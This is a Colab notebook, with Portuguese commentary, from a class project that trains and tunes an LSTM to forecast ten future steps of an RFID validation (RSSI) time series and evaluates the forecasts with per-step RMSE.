# Optamos por escolher o modelo LSTM, abordado em aula, com o intuito de explorar seu uso e suas variações, expandindo assim o conhecimento aprendido em aula. Nos próximos tópicos faremos algumas abordagens nesse modelo com o uso de atributos Multivariado e Univariado. E também iremos usar uma abordagem para prever mais de um resultado (Multi-Step).
#
# Escolhemos outro modelo, não apresentado em aula, para explorar outras opções de modelos de Machine Learning e compará-lo com o primeiro modelo escolhido. Decidimos usar o Prophet do Facebook, pois é um modelo que tem sido considerado muito bom para problemas de séries temporais.
# + [markdown] id="g1g8qrElBkax"
# ###LSTM (Long-Short Term Memory)
# + id="H2h7RNf-rgmm" executionInfo={"status": "ok", "timestamp": 1607187495918, "user_tz": 180, "elapsed": 1031, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Scaling and hold-out splitting utilities for the LSTM experiments.
from sklearn.preprocessing import MinMaxScaler
from sklearn.model_selection import train_test_split
# + [markdown] id="8VLj__UMBuGp"
# ####Preparação dos Dados:
# + [markdown] id="ntlhaYXNB_UP"
# A primeira etapa será transformar o dataset atual em um dataset característico de um problema de aprendizado supervisionado, onde dado os valores X(t-1) (VALIDATION, MIN, MAX, MEAN e COUNT), ele deverá prever o valor de y (t) (VALIDATION). Ou dado o período X(t), ele deverá prever o valor de y(t+1)...y(t+n). Onde (t) é o periodo presente, (t-1) é o período passado e (t+n) é o período futuro.
#
# Para isso será utilizado uma função que faz essa transformação com a intenção de ter uma flexibilidade da escolha dos períodos.
# + id="clMjbyk9EibH" executionInfo={"status": "ok", "timestamp": 1607187511058, "user_tz": 180, "elapsed": 1014, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
#Função para conversão de um dataset em formato para aprendizado supervisionado. Trecho tirado do artigo abaixo:
#https://machinelearningmastery.com/multivariate-time-series-forecasting-lstms-keras/
def series_to_supervised(data, n_in=1, n_out=1, dropnan=True):
    """Frame a time series as a supervised-learning dataset.

    Builds shifted copies of every input column: ``n_in`` past steps become
    the inputs ``var{j}(t-i)`` and ``n_out`` steps starting at the current
    one become the targets ``var{j}(t)`` / ``var{j}(t+i)``.

    Args:
        data: observations as a list or a 2-D array/DataFrame.
        n_in: number of lag observations used as input (t-n_in ... t-1).
        n_out: number of future observations produced (t ... t+n_out-1).
        dropnan: whether to drop the rows left incomplete by the shifting.

    Returns:
        pandas.DataFrame arranged for supervised learning.
    """
    num_features = 1 if type(data) is list else data.shape[1]
    frame = pd.DataFrame(data)
    pieces, labels = [], []
    # Lagged input columns: t-n_in, ..., t-1.
    for lag in range(n_in, 0, -1):
        pieces.append(frame.shift(lag))
        labels.extend('var%d(t-%d)' % (feat + 1, lag) for feat in range(num_features))
    # Forecast columns: t, t+1, ..., t+n_out-1.
    for step in range(n_out):
        pieces.append(frame.shift(-step))
        if step == 0:
            labels.extend('var%d(t)' % (feat + 1) for feat in range(num_features))
        else:
            labels.extend('var%d(t+%d)' % (feat + 1, step) for feat in range(num_features))
    framed = pd.concat(pieces, axis=1)
    framed.columns = labels
    # Rows at the edges contain NaNs introduced by the shifts.
    if dropnan:
        framed.dropna(inplace=True)
    return framed
# + [markdown] id="4M2EaW3opf5K"
# Carregamento do dataset e pegando apenas os seus valores:
# + id="lMduQ4LgF4qP" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607187515980, "user_tz": 180, "elapsed": 1028, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="252c6d57-c24a-4750-eb85-3a9dd3e2aac2"
# Load the final dataset and keep only the numeric feature values
# (VALIDATION, MIN, MAX, MEAN, COUNT) as a float32 matrix.
df_LSTM = pd.read_csv('Dataset/FinalOutput.csv', index_col=0)
df_LSTM = df_LSTM.drop(['TIMESTAMP','EPC'], axis=1)
dfValues = df_LSTM.values
dfValues = dfValues.astype('float32')
dfValues
# + [markdown] id="gTb2Jm3FXgmb"
# Inicialmente faremos a transformação da série apenas para mostrar o funcionamento da função com 1 período.
# + id="I1KiQYKW0Rxy" colab={"base_uri": "https://localhost:8080/", "height": 204} executionInfo={"status": "ok", "timestamp": 1607187521505, "user_tz": 180, "elapsed": 846, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d15c26bf-d0cd-44b0-ace1-af925ebc839b"
# Demo of the helper: one lag period in, one step out.
dfNovo = series_to_supervised(dfValues, n_in=1, n_out=1, dropnan=True)
dfNovo.head()
# + [markdown] id="tFChwz-yXtj4"
# Abaixo a transformação escolhida será para atender o que chamamos de método Multivariating - Multi-Step forecast, na realidade é a junção de 2 métodos que encontramos na literatura e exemplos do LSTM.
#
# **Multivariating** significa que utilizaremos mais de 1 característica com entrada para treinar o modelo.
#
# **Multi-Step** significa que iremos, através de um período passado prever 10 períodos futuros.
# Como o objetivo é prever o valor do campo VALIDATION, aqui representado pela (var1), não precisaremos dos outros atributos e por isso vamos removê-los desse resultado.
# + id="h2Z1r9nuAAs9" colab={"base_uri": "https://localhost:8080/", "height": 270} executionInfo={"status": "ok", "timestamp": 1607187611772, "user_tz": 180, "elapsed": 1004, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="12d16efa-f887-4789-c872-25ad32682e7d"
# Frame the series with 30 lag steps of all five features as input and the
# next 10 steps as output, then keep only var1 (VALIDATION) as the target:
# the forecast columns of var2..var5 are dropped.
dfNovo10 = series_to_supervised(dfValues, n_in=30, n_out=10, dropnan=True)
suffixes = ['(t)'] + ['(t+%d)' % step for step in range(1, 10)]
dropList = ['var%d%s' % (feature, suffix) for suffix in suffixes for feature in range(2, 6)]
dfNovo10.drop(dropList, axis=1, inplace=True)
dfNovo10.head()
# + [markdown] id="B8DEJrp4CMSv"
# #### Separação dos dados em treino e teste
# + [markdown] id="NejCTgOMCWOi"
# Para separação entre treino e teste, deixaremos 80% dos dados para treino e 20% para teste.
# + id="tdor9BgCnqoh" colab={"base_uri": "https://localhost:8080/", "height": 270} executionInfo={"status": "ok", "timestamp": 1607187627211, "user_tz": 180, "elapsed": 944, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ad7e9b61-ed3c-4d52-8f26-4bea8f796d7f"
dfNovo10.head(5)
# + [markdown] id="cJXgNSDgcDyA"
# Os 5 primeiros atributos dos 30 periodos passados serão salvos em X. E as 10 próximas colunas que representam nossa Classe serão salvos em y.
# + id="hl7bQAdnC-RI" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607187632275, "user_tz": 180, "elapsed": 559, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="9d296bf1-e690-4969-eec1-3ffc1400a26c"
# Attributes: first 30 periods x 5 features = 150 columns; the remaining
# 10 columns are the multi-step target (var1 at t..t+9).
X = np.array(dfNovo10)[:, :(30*5)]
print ('Atributos (%d x %d):' % (X.shape[0],X.shape[1]))
print (X)
y = np.array(dfNovo10)[:,(30*5):]
print ('Classe (%d x %d):' % (y.shape[0],y.shape[1]))
print (y)
# + [markdown] id="_iLLMsGOchKh"
# Aplicaremos a normalização dos dados usando o MinMaxScaler para cada X e y para melhorar a performance do treinamento e trazer todos os atributos para a mesma base.
# + id="Fl1RkmHTnFpv" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607187640636, "user_tz": 180, "elapsed": 989, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="4f9147aa-a5e1-4350-831c-b234b3ae59b0"
# Separate [0, 1] scalers for inputs and targets, so scalerY can later be
# used alone to invert the forecasts back to real RSSI values.
scalerX = MinMaxScaler(feature_range=(0, 1))
scalerY = MinMaxScaler(feature_range=(0, 1))
X_N = scalerX.fit_transform(X)
y_N = scalerY.fit_transform(y)
print('Tamanho do Dataset: ', X_N.shape[0])
print('Quantidade de Períodos (Atributos): ', X_N.shape[1])
print('Quantidade de Períodos (Classe): ', y_N.shape[1])
# + [markdown] id="_sIFqJm_F2Cb"
# Faremos a separação entre os atributos e classes para ambos os arrays (treino e teste) usando a biblioteca do sklearn.
# + id="5RzRyqurGBUG" colab={"base_uri": "https://localhost:8080/", "height": 316} executionInfo={"status": "ok", "timestamp": 1607187644709, "user_tz": 180, "elapsed": 1073, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="28412a3d-5249-4425-cff7-a6350cd15c25"
# 80/20 chronological split: shuffle=False keeps temporal order
# (NOTE(review): random_state has no effect when shuffle=False).
X_Train, X_Test, y_Train, y_Test = train_test_split(X_N, y_N, test_size=0.2, shuffle=False, random_state=100)
plt.pie([X_Train.shape[0],X_Test.shape[0]], labels=['Train','Test'], shadow=True)
plt.show()
print('Atributos - Train: ', X_Train.shape)
print('Atributos - Test:', X_Test.shape)
print('Classes - Train: ', y_Train.shape)
print('Classes - Test:', y_Test.shape)
# + [markdown] id="ixZjUtA0MqGq"
# Precisaremos acertar a dimensão dos arrays pois o LSTM espera um array 3D (samples, timesteps, attributes). Nesse caso utilizaremos (Shape[0], 30, 5), onde o valor 30 é devido aos 30 períodos e o valor 5 é referente aos 5 atributos que a série possui.
# + id="2Q8o_C89Mon4" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607187657827, "user_tz": 180, "elapsed": 979, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c27f826a-4402-421b-b96b-9ef6e3afcdf8"
# LSTM expects 3D input (samples, timesteps, features): 30 periods x 5 features.
X_Train = X_Train.reshape((X_Train.shape[0], 30, 5))
X_Test = X_Test.reshape((X_Test.shape[0], 30, 5))
print (X_Train.shape, X_Test.shape, y_Train.shape, y_Test.shape)
# + colab={"base_uri": "https://localhost:8080/"} id="swSZdTg0Keq-" executionInfo={"status": "ok", "timestamp": 1607187660008, "user_tz": 180, "elapsed": 1001, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c71299fc-2530-4e2e-805d-b63ced75586a"
X_Train[0]
# + [markdown] id="x4-vcLw2NTyT"
# #### Arquitetura do Modelo e Treino
# + id="HAloPNBMN4jA" executionInfo={"status": "ok", "timestamp": 1607187667012, "user_tz": 180, "elapsed": 2215, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
from keras.models import Sequential, load_model
from keras.layers import Dense, LSTM, Dropout
# + [markdown] id="tbIZ2zQELc8H"
# Foi criado essa função para facilitar na análise dos parametros do modelo, onde foram testadas várias arquiteturas e a que melhor apresentou resultados foi a arquitetura abaixo.
# + id="mzojPychsCLd" executionInfo={"status": "ok", "timestamp": 1607187669739, "user_tz": 180, "elapsed": 1069, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
def fitModel (X_Train, y_Train, X_Test, y_Test, input, batch, epochs):
  """Build, train and evaluate the LSTM forecaster.

  Topology: LSTM(`input` units) -> Dense(10, relu) -> Dense(10 linear),
  one output unit per forecast step, compiled with MAE loss and Adam.
  The train/validation loss curves are plotted after fitting.

  Returns the (history, model) pair.
  """
  net = Sequential()
  net.add(LSTM(input, input_shape=(X_Train.shape[1], X_Train.shape[2])))
  net.add(Dense(10, activation='relu'))
  net.add(Dense(10))
  net.compile(loss='mae', optimizer='adam')
  # shuffle=False preserves the chronological order of the windows.
  record = net.fit(
      X_Train, y_Train,
      epochs=epochs,
      batch_size=batch,
      validation_data=(X_Test, y_Test),
      verbose=1,
      shuffle=False,
  )
  # Loss curves make over/under-fitting easy to spot.
  for curve, tag in ((record.history['loss'], 'train'),
                     (record.history['val_loss'], 'test')):
    plt.plot(curve, label=tag)
  plt.legend()
  plt.show()
  return record, net
# + [markdown] id="reUp35wxLriX"
# Criamos um gridSearch manual no qual ele treina o modelo para cada parametro estipulado. Sua entrada é a quantidade de loops que cada FOR vai executar. O primeiro é a variação entre os batchs que vai de 2 à 64, crescendo de forma exponencial. A próxima variação é o input da rede que varia da mesma forma e por fim a quantidade de épocas que aumenta de 5 em 5.
# + id="VSulavluxhru" executionInfo={"status": "ok", "timestamp": 1607187674847, "user_tz": 180, "elapsed": 1013, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
def myGridSearch(loopA, loopB, loopC):
  """Manual hyper-parameter sweep over epochs, LSTM units and batch size.

  epochs grows by 5 per outer iteration; units and batch size double per
  iteration (2, 4, 8, ...). Every combination is trained via fitModel and
  the resulting (history, model) pairs are collected in sweep order.
  """
  hist = []
  epochs = 0
  for _ in range(loopA):
    epochs += 5
    n_units = 1
    for _ in range(loopB):
      n_units *= 2
      n_batch = 1
      for _ in range(loopC):
        n_batch *= 2
        print('================FIT Parameters -> epochs: %d -> input: %d -> batch: %d ====================' % (epochs,n_units,n_batch))
        hist.append(fitModel(X_Train, y_Train, X_Test, y_Test, n_units, n_batch, epochs))
  return hist
# + [markdown] id="JA_tb7LzM_bu"
# Analisando o resultado abaixo identificamos que os melhores parâmetros foram **Epochs = 15, Input = 64 e Batch = 4** ou **Epochs = 10, Input = 32 e Batch = 2**. Esses dois resultados deram valores de loss muito parecidos.
# + id="MJ8ecNsp3D2w" colab={"base_uri": "https://localhost:8080/", "height": 1000} outputId="b9415bec-69da-4342-e2fa-c35e5e3a1f52"
# Full sweep: 3 epoch steps x 6 unit sizes x 6 batch sizes = 108 fits (slow).
losses = myGridSearch(3,6,6)
print(losses)
# + [markdown] id="eIaBeA1iWvVM"
# Para critério de comparação criamos um GridSearch utilizando o SKlearn e os mesmos parâmetros.
# + id="KUDX18U5EhhH" executionInfo={"status": "ok", "timestamp": 1607187703436, "user_tz": 180, "elapsed": 1007, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
from keras.wrappers.scikit_learn import KerasClassifier, KerasRegressor
from sklearn.model_selection import GridSearchCV
def build_classifier(optimizer,units):
  """Model factory consumed by sklearn's GridSearchCV via KerasRegressor.

  Same topology as fitModel — LSTM(units) -> Dense(10, relu) -> Dense(10) —
  compiled with MAE loss, the given optimizer and MSE as an extra metric.
  """
  net = Sequential()
  net.add(LSTM(units=units, input_shape=(30, 5)))
  net.add(Dense(10, activation='relu'))
  net.add(Dense(10))
  net.compile(loss='mae', optimizer=optimizer, metrics=['mean_squared_error'])
  return net
# + [markdown] id="J3u9OxGfXAFl"
# Os valores abaixo foram os mesmos utilizados no myGridSearch. A diferença foi no dado de entrada, nesse caso utilizei o dataset inteiro devido ao parâmetro de crossvalidation do gridsearch.
# + colab={"base_uri": "https://localhost:8080/"} id="ehmle_2seUT8" executionInfo={"status": "ok", "timestamp": 1605996396712, "user_tz": 180, "elapsed": 29920541, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c9565f60-aebc-43b9-ff4f-ad86f822bb4f"
# sklearn GridSearchCV over the same parameter grid as myGridSearch,
# with 2-fold cross-validation on the whole (reshaped) dataset.
grid_model = KerasRegressor(build_fn=build_classifier)
parameters = {'batch_size' : [2,4,8,16,32,64],
'epochs' : [5,10,15],
'units' : [2,4,8,16,32,64],
'optimizer' : ['adam'] }
grid_search = GridSearchCV(estimator = grid_model,
param_grid = parameters,
#scoring = 'max_error',
cv = 2)
grid_search = grid_search.fit(X_N.reshape((X_N.shape[0], 30, 5)), y_N)
# + id="Ztq2dQ0sE0qG"
# Winning hyper-parameters and their cross-validated score.
best_parameters = grid_search.best_params_
best_accuracy = grid_search.best_score_
# + [markdown] id="ptH5RZsjX12P"
# O melhor valor sugerido deu bem diferente dos testes do myGridSearch. Para validar novamente os resultados sugeridos eu rodei o treino individualmente.
# + colab={"base_uri": "https://localhost:8080/"} id="Zq0d_wFiE6ZV" executionInfo={"status": "ok", "timestamp": 1605996399459, "user_tz": 180, "elapsed": 2661, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="06697b1e-72c4-477f-ba6a-175f17ca6230"
best_parameters
# + [markdown] id="_ci5ELXqYVol"
# Treinamento utilizando os parâmetros do GridSearch (sklearn):
# + colab={"base_uri": "https://localhost:8080/", "height": 608} id="2bTAU7HLH7pW" executionInfo={"status": "ok", "timestamp": 1606138955294, "user_tz": 180, "elapsed": 56147, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="a390d850-b68b-4189-c413-7c4d582bcea1"
hist, model = fitModel (X_Train, y_Train, X_Test, y_Test, 16, 64, 10)
# + [markdown] id="GBpwCifLYcnR"
# Treinamento utilizando os parâmetros do myGridSearch:
# + colab={"base_uri": "https://localhost:8080/", "height": 775} id="BpU4_n_XV5-o" executionInfo={"status": "ok", "timestamp": 1607188231342, "user_tz": 180, "elapsed": 485180, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="8b328d84-64c7-4d04-f5d4-ff6928d8f6c2"
hist, model = fitModel (X_Train, y_Train, X_Test, y_Test, 64, 4, 15)
# + id="SxhRt2pc5I3S" executionInfo={"status": "ok", "timestamp": 1607188241839, "user_tz": 180, "elapsed": 758, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
model.save('model_LSTM.h5')
# + [markdown] id="MMDGOMgfjudI"
# O modelo escolhido foi salvo para uso futuro e não precisar rodar as etapas acima novamente. Em seguida carregaremos o modelo treinado para iniciar as predições.
# + [markdown] id="El62PtWIkLKj"
# #### Predição e Métricas (RMSE)
# + id="hvft41IophDz" executionInfo={"status": "ok", "timestamp": 1607188253522, "user_tz": 180, "elapsed": 1293, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
model = load_model('model_LSTM.h5')
# + [markdown] id="mdkmQ83xlOS3"
# Lembrando que a ideia é fazer a predição ou forecast dos próximos 10 valores de validação do sistema RFID e compará-los com a base de teste para calcular o erro e medir sua eficácia.
#
# A função abaixo será chamada para fazer a predição que retornar um array de tamanho 10 com os resultados.
# + id="3juCpohCUVvn" executionInfo={"status": "ok", "timestamp": 1607188266522, "user_tz": 180, "elapsed": 1014, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
def predict_lstm(model, X, n_batch):
  """Forecast the next 10 periods from a single input window.

  X arrives as a 2D (timesteps, features) window; the LSTM expects a 3D
  batch of shape (samples, timesteps, features), so a singleton batch axis
  is prepended before predicting. The forecast row is returned as a plain
  Python list for easier downstream handling.
  """
  window = X.reshape(1, X.shape[0], X.shape[1])
  forecast = model.predict(window, batch_size=n_batch)
  return list(forecast[0, :])
# + [markdown] id="DbXa266boU7T"
# Abaixo iremos montar o yPred, ou seja, as predições de todo o X_Test.
# + colab={"base_uri": "https://localhost:8080/"} id="MaZ8oEwYlwHl" executionInfo={"status": "ok", "timestamp": 1607188577241, "user_tz": 180, "elapsed": 275842, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="83e56676-14ae-4067-b17f-9c1fab23f55e"
# Forecast 10 steps ahead for every test window, one window at a time.
yPred = list()
for i in range (len(X_Test)):
  forecast = predict_lstm(model, X_Test[i], 1)
  yPred.append(forecast)
yPred
# + [markdown] id="zFyy5yCTq1cL"
# Para facilitar a comparação iremos transformar o y_Test em uma lista de arrays.
# + id="3Ay36f0gG00B" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188577242, "user_tz": 180, "elapsed": 156000, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="96c675e4-0872-4f7a-b864-6b742b8f8435"
# Copy the test targets into a list of rows, mirroring yPred's layout.
yTest = [row[:] for row in y_Test]
yTest
# + [markdown] id="08GEySzlrgXC"
# Utilizando a função de Mean_Squared_Error do Sklearn iremos calcular o erro em cada saida.
# + id="sP773dGUHImQ" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188578785, "user_tz": 180, "elapsed": 1490, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="9350656c-2583-48ff-9701-11b58c7a6ff4"
from sklearn.metrics import mean_squared_error
from math import sqrt
# Per-horizon RMSE (still in the normalized [0, 1] scale): compare column i
# of the actuals against column i of every forecast, for t+1 .. t+10.
for i in range(10):
  actuals = [row[i] for row in yTest]
  predicted = [forecast[i] for forecast in yPred]
  rmse = sqrt(mean_squared_error(actuals, predicted))
  print('t+%d RMSE: %f' % ((i+1), rmse))
# + [markdown] id="hXRpfPsMxEfB"
# Em valores que variam entre 0 e 1 o erro quadrático médio, para todos os períodos futuros estão próximos de 6.9%. Valor considerado coerente para natureza da operação. Se converter em RSSI, isso daria menos de 1db, ou seja, isso não influenciaria na qualidade da validação do sistema.
#
# Veremos em mais detalhes a frente com as devidas conversões.
#
# A função abaixo foi criada para facilitar a conversão inversa da transformação feita no inicio do estudo.
# + id="bXVXhyuDIH9Z" executionInfo={"status": "ok", "timestamp": 1607188614627, "user_tz": 180, "elapsed": 1013, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Undo the MinMax scaling applied before training. Adapted from:
# https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term-memory-networks-python/
def inverse_transform(forecasts, scaler):
  """Map scaled forecast rows back to the original value range.

  Each row is reshaped to the (1, n) layout scaler.inverse_transform
  expects, then flattened again, so the output mirrors the input: a list
  of 1-D arrays.
  """
  restored = list()
  for row in forecasts:
    as_matrix = np.array(row).reshape(1, len(row))
    unscaled = scaler.inverse_transform(as_matrix)
    restored.append(unscaled[0, :])
  return restored
# + [markdown] id="jr8-kkp5zuJQ"
# Conversão do yPred
# + id="QF0bP08cIXz7" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188648039, "user_tz": 180, "elapsed": 1383, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c05423a8-cbd0-4358-e99e-8097f8ce5f3b"
# Forecasts back in real RSSI units.
iforecasts = inverse_transform(yPred, scalerY)
iforecasts
# + [markdown] id="DQCsHLDU6Bkh"
# Conversão do Y Test
# + id="EsBFY94d0fWW" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188653010, "user_tz": 180, "elapsed": 1576, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="7634a240-bc37-4670-b043-4518a2479db2"
# Test targets back in real RSSI units.
iyTest = inverse_transform(yTest, scalerY)
iyTest
# + [markdown] id="BTVNM7uX6Fpx"
# Conversão do Y Treino
# + id="nqA0Idxj0rj0" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188657711, "user_tz": 180, "elapsed": 2812, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="161ca579-fde6-44c3-b24f-6b3c486fe6db"
# Training targets back in real RSSI units.
iyTrain = inverse_transform(y_Train, scalerY)
iyTrain
# + [markdown] id="kwFSy6MD6OIa"
# Após as conversões iremos criar um novo dataset para mostrar os resultados em um gráfico comparativo.
# + id="HCBm8mqa1YHO" executionInfo={"status": "ok", "timestamp": 1607188663024, "user_tz": 180, "elapsed": 1041, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Keep only the first forecast step (t+1) of each 10-step row for plotting.
iforecasts = [row[:1] for row in iforecasts]
iyTest = [row[:1] for row in iyTest]
iyTrain = [row[:1] for row in iyTrain]
# + id="mF17Lr0j31IY" executionInfo={"status": "ok", "timestamp": 1607188665527, "user_tz": 180, "elapsed": 1034, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Flatten the single-step rows into 1-D series.
iyTrain=np.array(iyTrain).reshape(-1)
iyTest=np.array(iyTest).reshape(-1)
iforecasts=np.array(iforecasts).reshape(-1)
# + id="gYHVU54C7bw2" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188668643, "user_tz": 180, "elapsed": 986, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ac9ada94-7133-4846-9868-b9a6a19da5c3"
# Sanity check of the flattened series lengths.
print(iyTrain.shape)
print(iyTest.shape)
# + id="7EP8cOLE_16e" colab={"base_uri": "https://localhost:8080/", "height": 419} executionInfo={"status": "ok", "timestamp": 1607188675144, "user_tz": 180, "elapsed": 836, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="42c407a6-1638-4c7a-f810-8b259b841c0a"
# Training series as a DataFrame for the comparison plot.
dfOriginal = pd.DataFrame(iyTrain, columns=['TRAIN'])
dfOriginal
# + id="Z0RBBatTBS7b" colab={"base_uri": "https://localhost:8080/", "height": 419} executionInfo={"status": "ok", "timestamp": 1607188679021, "user_tz": 180, "elapsed": 1044, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="40854732-2dc6-46bb-e4c8-35c40dd5baa5"
# Test series indexed to follow the training series. NOTE(review): the index
# starts at len(dfOriginal)-1, overlapping the last train index by one —
# presumably so the curves connect visually in the plot; confirm intent.
dfOriginalTest = pd.DataFrame(iyTest, columns=['TEST'])
dfOriginalTest.index = np.arange(len(dfOriginal)-1, len(dfOriginalTest)+len(dfOriginal)-1)
dfOriginalTest
